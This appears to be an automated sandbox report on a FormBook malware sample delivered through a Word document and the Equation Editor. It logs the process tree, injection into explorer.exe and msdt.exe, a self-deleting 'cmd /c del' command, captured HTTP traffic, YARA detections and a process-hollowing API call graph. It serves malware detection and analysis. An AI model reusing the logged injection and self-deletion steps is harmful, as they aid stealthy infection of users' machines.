                                                                          Data Raw: 35 63 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 32 4d 6b 39 45 68 6f 70 62 58 4d 75 34 32 65 61 76 67 4b 31 79 58 45 34 50 67 6c 73 52 76 52 38 71 6a 61 56 6c 32 6d 4e 56 42 53 69 7a 4b 52 38 57 55 6d 62 31 57 61 2b 62 75 66 6c 63 6d 33 6d 64 34 63 6c 57 51 67 59 51 59 44 34 6a 55 31 56 65 54 58 6c 51 67 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 72 65 61 6c 73 74 61 6b 65 70 6f 6f 6c 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 51 75 65 73 74 6f 20 73 69 74 6f 20 77 65 62 20 c3 a8 20 69 6e 20 76 65 6e 64 69 74 61 21 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 72 65 61 6c 73 74 61 6b 65 70 6f 6f 6c 20 52 69 73 6f 72 73 65 20 65 20 69 6e 66 6f 72 6d 61 7a 69 6f 6e 65 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 51 75 65 73 74 6f 20 73 69 74 6f 20 77 65 62 20 c3 a8 20 69 6e 20 76 65 6e 64 69 74 61 21 20 72 65 61 6c 73 74 61 6b 65 70 6f 6f 6c 2e 63 6f 6d 20 c3 a8 20 6c 61 20 70 72 69 6d 61 20 65 20 6d 69 67 6c 69 6f 72 20 66 6f 6e 74 65 20 70 65 72 20 74 75 74 74 65 20 6c 65 20 69 6e 66 6f 72 6d 61 7a 69 6f 6e 69 20 72 69 63 65 72 63 61 74 65 2e 20 44 61 20 74 65 6d 69 20 67 65 6e 65 72 61 6c 69 20 61 20
                                                                          Data Ascii: 5c51<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_2Mk9EhopbXMu42eavgK1yXE4PglsRvR8qjaVl2mNVBSizKR8WUmb1Wa+buflcm3md4clWQgYQYD4jU1VeTXlQg==><head><meta charset="utf-8"><title>realstakepool.com&nbsp;-&nbsp;Questo sito web in vendita!&nbsp;-&nbsp;realstakepool Risorse e informazione.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="Questo sito web in vendita! realstakepool.com la prima e miglior fonte per tutte le informazioni ricercate. Da temi generali a
                                                                          Jan 13, 2022 18:19:04.058192015 CET760INData Raw: 70 69 c3 b9 20 64 69 20 71 75 65 6c 6c 6f 20 63 68 65 20 63 69 20 73 69 20 61 73 70 65 74 74 65 72 65 62 62 65 20 64 69 20 74 72 6f 76 61 72 65 20 71
                                                                          Data Ascii: pi di quello che ci si aspetterebbe di trovare q
                                                                          Jan 13, 2022 18:19:04.058206081 CET761INData Raw: 75 69 2c 20 72 65 61 6c 73 74 61 6b 65 70 6f 6f 6c 2e 63 6f 6d 20 63 26 23 30 33 39 3b c3 a8 20 74 75 74 74 6f 2e 20 4c 65 20 61 75 67 75 72 69 61 6d 6f 20 64 69 20 74 72 6f 76 61 72 65 20 63 69 c3 b2 20 63 68 65 20 63 65 72 63 61 21 22 3e 3c 6c
                                                                          Data Ascii: ui, realstakepool.com c&#039; tutto. Le auguriamo di trovare ci che cerca!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.png"/><style> .container-custom-link{text-
                                                                          Jan 13, 2022 18:19:04.058223963 CET762INData Raw: 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73
                                                                          Data Ascii: svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=reset],[type=s
                                                                          Jan 13, 2022 18:19:04.058233976 CET763INData Raw: 6e 3a 63 65 6e 74 65 72 3b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 70 7b 63 6f 6c 6f 72 3a 23 37 31 37 31 37 31 7d 2e 61 6e 6e 6f 75 6e 63 65 6d 65 6e 74 20 61 7b 63 6f 6c 6f 72 3a 23 37 31 37 31 37 31
                                                                          Data Ascii: n:center;padding:0 5px}.announcement p{color:#717171}.announcement a{color:#717171}.container-header
                                                                          Jan 13, 2022 18:19:04.058247089 CET764INData Raw: 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 20 30 20 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 68 65 61 64 65 72 5f 5f 63 6f 6e 74 65 6e 74 7b 63 6f 6c 6f 72 3a 23 37 31 37 31 37 31 7d 2e
                                                                          Data Ascii: {margin:0 auto 0 auto;text-align:center}.container-header__content{color:#717171}.container-content{margin:25px auto 20px auto;text-align:center;background:url("//img.sedoparking.com/templates/bg/arrows-1-colors-3.png") #fbfbfb no-repeat cente
                                                                          Jan 13, 2022 18:19:04.058264017 CET765INData Raw: 6c 65 6d 65 6e 74 2d 74 65 78 74 7b 70 61 64 64 69 6e 67 3a 33 70 78 20 30 20 36 70 78 20 30 3b 6d 61 72 67 69 6e 3a 2e 31 31 65 6d 20 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 38 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 7d 2e 74 77 6f 2d 74 69
                                                                          Data Ascii: lement-text{padding:3px 0 6px 0;margin:.11em 0;line-height:18px;color:#000}.two-tier-ads-list__list-element-link{font-size:1em;text-decoration:underline;color:#0a48ff}.two-tier-ads-list__list-element-link:link,.two-tier-ads-list__list-element-
                                                                          Jan 13, 2022 18:19:04.058280945 CET767INData Raw: 2d 62 6f 74 74 6f 6d 3a 35 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 73 65 61 72 63 68 62 6f 78 5f 5f 63 6f 6e 74 65 6e 74 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b
                                                                          Data Ascii: -bottom:50px;text-align:center}.container-searchbox__content{display:inline-block;font-family:arial,sans-serif;font-size:12px}.container-searchbox__searchtext-label{display:none}.container-searchbox__input,.container-searchbox__button{border:0
                                                                          Jan 13, 2022 18:19:04.058293104 CET767INData Raw: 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 68 65 61 64 65 72 2c 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 74 65 78 74 7b 63 6f 6c 6f 72 3a 23
                                                                          Data Ascii: ent-interactive-header,.container-cookie-message__content-interactive-text{color:#fff}.container-cookie-message__content-interactive-header{font-size:
                                                                          Jan 13, 2022 18:19:04.058305979 CET768INData Raw: 73 6d 61 6c 6c 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 5f 5f 63 6f 6e 74 65 6e 74 2d 69 6e 74 65 72 61 63 74 69 76 65 2d 74 65 78 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 6d 61 72 67 69 6e 2d 72
                                                                          Data Ascii: small}.container-cookie-message__content-interactive-text{margin-top:10px;margin-right:0px;margin-bottom:5px;margin-left:0px;font-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,
                                                                          Jan 13, 2022 18:19:04.058319092 CET770INData Raw: 72 3a 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 69 74 69 61 6c 7d 2e 62 74 6e 2d 2d 73 75 63 63 65 73 73 2d 73 6d 3a 68 6f 76 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 36 62 32 63 3b 62 6f 72 64 65 72 2d 63 6f
                                                                          Data Ascii: r:#fff;font-size:initial}.btn--success-sm:hover{background-color:#1a6b2c;border-color:#1a6b2c;color:#fff;font-size:initial}.btn--secondary{background-color:#8c959c;border-color:#8c959c;color:#fff;font-size:medium}.btn--secondary:hover{backgrou


                                                                          Code Manipulations

                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          Analysis Process: WINWORD.EXE PID: 2644 Parent PID: 596

                                                                          General

                                                                          Start time:18:16:16
                                                                          Start date:13/01/2022
                                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                          Imagebase:0x13f140000
                                                                          File size:1423704 bytes
                                                                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: EQNEDT32.EXE PID: 1124 Parent PID: 596

                                                                          General

                                                                          Start time:18:16:18
                                                                          Start date:13/01/2022
                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                          Imagebase:0x400000
                                                                          File size:543304 bytes
                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: medicomsh78694.exe PID: 2824 Parent PID: 1124

                                                                          General

                                                                          Start time:18:16:19
                                                                          Start date:13/01/2022
                                                                          Path:C:\Users\user\AppData\Roaming\medicomsh78694.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\AppData\Roaming\medicomsh78694.exe
                                                                          Imagebase:0xad0000
                                                                          File size:707072 bytes
                                                                          MD5 hash:8807C2E0F2973A22812AF6E61BA72667
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:.Net C# or VB.NET
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.426191133.0000000003139000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.424376264.00000000024B2000.00000004.00000001.sdmp, Author: Joe Security
                                                                          Antivirus matches:
                                                                          • Detection: 100%, Joe Sandbox ML
                                                                          • Detection: 34%, Metadefender, Browse
                                                                          • Detection: 51%, ReversingLabs
                                                                          Reputation:low

                                                                          Chronological Activities

                                                                          Analysis Process: medicomsh78694.exe PID: 2008 Parent PID: 2824

                                                                          General

                                                                          Start time:18:16:24
                                                                          Start date:13/01/2022
                                                                          Path:C:\Users\user\AppData\Roaming\medicomsh78694.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:{path}
                                                                          Imagebase:0xad0000
                                                                          File size:707072 bytes
                                                                          MD5 hash:8807C2E0F2973A22812AF6E61BA72667
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.459819951.0000000000380000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.421277474.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.459848948.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.459738271.00000000001C0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.421612271.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low

                                                                          Chronological Activities

                                                                          Analysis Process: explorer.exe PID: 1764 Parent PID: 2008

                                                                          General

                                                                          Start time:18:16:27
                                                                          Start date:13/01/2022
                                                                          Path:C:\Windows\explorer.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Explorer.EXE
                                                                          Imagebase:0xffa10000
                                                                          File size:3229696 bytes
                                                                          MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.451724883.00000000097D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.444150241.00000000097D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:high

                                                                          Chronological Activities

                                                                          Analysis Process: msdt.exe PID: 2848 Parent PID: 1764

                                                                          General

                                                                          Start time:18:16:40
                                                                          Start date:13/01/2022
                                                                          Path:C:\Windows\SysWOW64\msdt.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\SysWOW64\msdt.exe
                                                                          Imagebase:0xc40000
                                                                          File size:983040 bytes
                                                                          MD5 hash:F67A64C46DE10425045AF682802F5BA6
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.674644749.00000000001E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.674581612.0000000000080000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.674669854.0000000000210000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:moderate

                                                                          Chronological Activities

                                                                          Analysis Process: cmd.exe PID: 448 Parent PID: 2848

                                                                          General

                                                                          Start time:18:16:44
                                                                          Start date:13/01/2022
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:/c del "C:\Users\user\AppData\Roaming\medicomsh78694.exe"
                                                                          Imagebase:0x4a2b0000
                                                                          File size:302592 bytes
                                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language

                                                                          Chronological Activities

                                                                          Disassembly

                                                                          Code Analysis

                                                                          Reset < >

                                                                            Analysis Process: medicomsh78694.exe PID: 2824 Parent PID: 1124 medicomsh78694.exeCOMMON

                                                                            Execution Graph

                                                                            Execution Coverage:18.3%
                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:43
                                                                            Total number of Limit Nodes:0

                                                                            Graph

                                                                            execution_graph 8170 44e400 8171 44e484 CreateProcessW 8170->8171 8173 44e5f1 8171->8173 8178 44f1d0 8179 44f215 ResumeThread 8178->8179 8180 44f260 8179->8180 8181 44e970 8182 44e9c0 ReadProcessMemory 8181->8182 8183 44ea37 8182->8183 8174 44efa8 8175 44eff8 WriteProcessMemory 8174->8175 8177 44f090 8175->8177 8184 44e858 8185 44e8a5 Wow64SetThreadContext 8184->8185 8187 44e91c 8185->8187 8188 44ee98 8189 44eee0 VirtualAllocEx 8188->8189 8190 44ef57 8189->8190 8191 4404b8 8192 4404ca 8191->8192 8193 4404e1 8192->8193 8201 448a80 8192->8201 8204 447038 8192->8204 8207 447dce 8192->8207 8210 447dfc 8192->8210 8213 44793c 8192->8213 8216 448762 8192->8216 8219 446ee1 8192->8219 8222 4491a8 8201->8222 8206 4491a8 VirtualProtect 8204->8206 8205 44704c 8206->8205 8209 4491a8 VirtualProtect 8207->8209 8208 447ddf 8209->8208 8212 4491a8 VirtualProtect 8210->8212 8211 447e0f 8212->8211 8215 4491a8 VirtualProtect 8213->8215 8214 44794d 8215->8214 8218 4491a8 VirtualProtect 8216->8218 8217 44877e 8218->8217 8221 4491a8 VirtualProtect 8219->8221 8220 446efd 8221->8220 8223 4491f5 VirtualProtect 8222->8223 8224 448a94 8223->8224

                                                                            Executed Functions

                                                                            Function 003706CC, Relevance: 12.6, Strings: 5, Instructions: 6395COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 3706cc-371413 3 371415 0->3 4 37141a-374781 call 370788 call 370798 call 37c918 0->4 3->4 635 374787-377f76 4->635
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: (.Pk$(.Pk$4{Pk$4{Pk$DtPk
                                                                            • API String ID: 0-485576172
                                                                            • Opcode ID: 0f245ae74aab8381d37433354f88060b914b78a2e65527e1f0c4648b46a8253c
                                                                            • Instruction ID: 67209c9cc5953c80edb16a1dc66899baff12bb0eddfdc34df804df80ecb93b92
                                                                            • Opcode Fuzzy Hash: 0f245ae74aab8381d37433354f88060b914b78a2e65527e1f0c4648b46a8253c
                                                                            • Instruction Fuzzy Hash: 61F39374A44628CFD764DF24C894E99B7B2FF49305F1581EAE909AB361DB31AE81CF40
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0037F108, Relevance: 3.0, Strings: 2, Instructions: 495COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1280 37f108-37f128 1281 37f12d-37f130 1280->1281 1282 37f132 1281->1282 1283 37f139-37f142 1281->1283 1282->1283 1284 37f1a5-37f1af 1282->1284 1285 37f1e3-37f1ea 1282->1285 1286 37f1c2-37f1cb 1282->1286 1287 37f1d1-37f1d4 1282->1287 1288 37f18a-37f195 1282->1288 1289 37f1d9-37f1de 1282->1289 1290 37f1ed-37f25c 1283->1290 1291 37f148-37f15c 1283->1291 1284->1290 1294 37f1b1-37f1bd 1284->1294 1286->1287 1287->1281 1292 37f197 1288->1292 1293 37f19e-37f1a3 1288->1293 1289->1281 1299 37f27e-37f2b3 1290->1299 1291->1290 1295 37f162-37f177 1291->1295 1296 37f19c 1292->1296 1293->1284 1293->1296 1294->1281 1295->1290 1298 37f179-37f188 1295->1298 1296->1281 1298->1281 1302 37f467-37f4ed 1299->1302 1303 37f2b9-37f2c5 1299->1303 1321 37f526-37f52b 1302->1321 1304 37f25e-37f261 1303->1304 1305 37f263 1304->1305 1306 37f26a-37f27c 1304->1306 1305->1299 1305->1306 1308 37f436-37f44d 1305->1308 1309 37f3d4-37f3dc 1305->1309 1310 37f452-37f466 1305->1310 1311 37f41f-37f423 1305->1311 1312 37f31d-37f329 1305->1312 1313 37f37a-37f3a4 1305->1313 1314 37f2c7-37f2ce 1305->1314 1315 37f302-37f306 1305->1315 1316 37f3e1-37f3e9 1305->1316 1317 37f3ee-37f3f5 1305->1317 1318 37f2e9-37f2ed 1305->1318 1319 37f3a9-37f3ad 1305->1319 1320 37f408-37f41a 1305->1320 1306->1304 1308->1304 1309->1304 1327 37f425 1311->1327 1328 37f42f-37f434 1311->1328 1312->1302 1331 37f32f-37f34a 1312->1331 1313->1304 1314->1302 1329 37f2d4-37f2e4 1314->1329 1315->1302 1330 37f30c-37f318 1315->1330 1316->1304 1317->1302 1325 37f3f7-37f403 1317->1325 1338 37f2f7-37f2ff 1318->1338 1323 37f3af 1319->1323 1324 37f3b9-37f3c0 1319->1324 1320->1304 1322 37f4ef-37f4f2 1321->1322 1339 37f4f4 1322->1339 1340 37f4fb-37f512 1322->1340 1333 37f3b4 1323->1333 1324->1302 1334 37f3c6-37f3d2 1324->1334 1325->1304 1335 37f42a 1327->1335 1328->1335 1329->1304 1330->1304 1331->1302 1359 37f350-37f366 1331->1359 1333->1304 1334->1333 1335->1304 1338->1315 1339->1321 1339->1340 1341 37f567-37f573 1339->1341 1342 37f5d4-37f5de 1339->1342 1343 37f5a4-37f5a9 1339->1343 1344 37f560-37f565 1339->1344 1345 37f55e 1339->1345 1346 37f5ae-37f5b0 1339->1346 1347 37f52d-37f53a 1339->1347 1348 37f578-37f588 1339->1348 1356 37f5f1-37f638 1340->1356 1360 37f518-37f524 1340->1360 1341->1322 1342->1356 1357 37f5e0-37f5ec 1342->1357 1343->1322 1344->1322 1345->1344 1354 37f5b2-37f5b8 1346->1354 1355 37f5ca-37f5d3 1346->1355 1350 37f557-37f55c 1347->1350 1351 37f53c-37f543 1347->1351 1352 37f58f-37f591 1348->1352 1353 37f58a-37f58e 1348->1353 1363 37f555 1350->1363 1351->1356 1362 37f549-37f550 1351->1362 1365 37f593 1352->1365 1366 37f59d-37f5a2 1352->1366 1353->1352 1367 37f5bc-37f5c8 1354->1367 1368 37f5ba 1354->1368 1372 37f651-37f65f 1356->1372 1373 37f63a-37f64e 1356->1373 1357->1322 1359->1302 1361 37f36c-37f375 1359->1361 1360->1322 1361->1304 1362->1363 1363->1322 1369 37f598 1365->1369 1366->1369 1367->1355 1368->1355 1369->1322 1374 37f681-37f686 1372->1374 1373->1372 1375 37f661-37f664 1374->1375 1376 37f666 1375->1376 1377 37f66d-37f67f 1375->1377 1376->1374 1376->1377 1378 37f6f2-37f6f3 1376->1378 1379 37f73e-37f743 1376->1379 1380 37f71e-37f723 1376->1380 1381 37f6bb-37f6c4 1376->1381 1382 37f6fa-37f712 1376->1382 1383 37f6d8-37f6ed 1376->1383 1384 37f688-37f69e 1376->1384 1385 37f728-37f73b 1376->1385 1377->1375 1378->1382 1379->1375 1380->1375 1388 37f6ca-37f6d6 1381->1388 1389 37f748-37f74e 1381->1389 1382->1375 1383->1375 1384->1375 1388->1375
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.422951469.0000000000370000.00000040.00000001.sdmp, Offset: 00370000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_370000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: ,/0m$,/0m
                                                                            • API String ID: 0-3210878908
                                                                            • Opcode ID: 714a0da0a229848d77513bddbd619124ca798f2a6726c8d11036a38a0d136224
                                                                            • Instruction ID: 68ac040e409a782c23e8b03c61603595f0986bde30d51ed271b20d971286ac0a
                                                                            • Opcode Fuzzy Hash: 714a0da0a229848d77513bddbd619124ca798f2a6726c8d11036a38a0d136224
                                                                            • Instruction Fuzzy Hash: 13020370A08256CFC722CBA9C8456BABBF5BF45310F15C67BE459DBA92C338C846C752
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004414BD, Relevance: .2, Instructions: 219COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.423042150.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
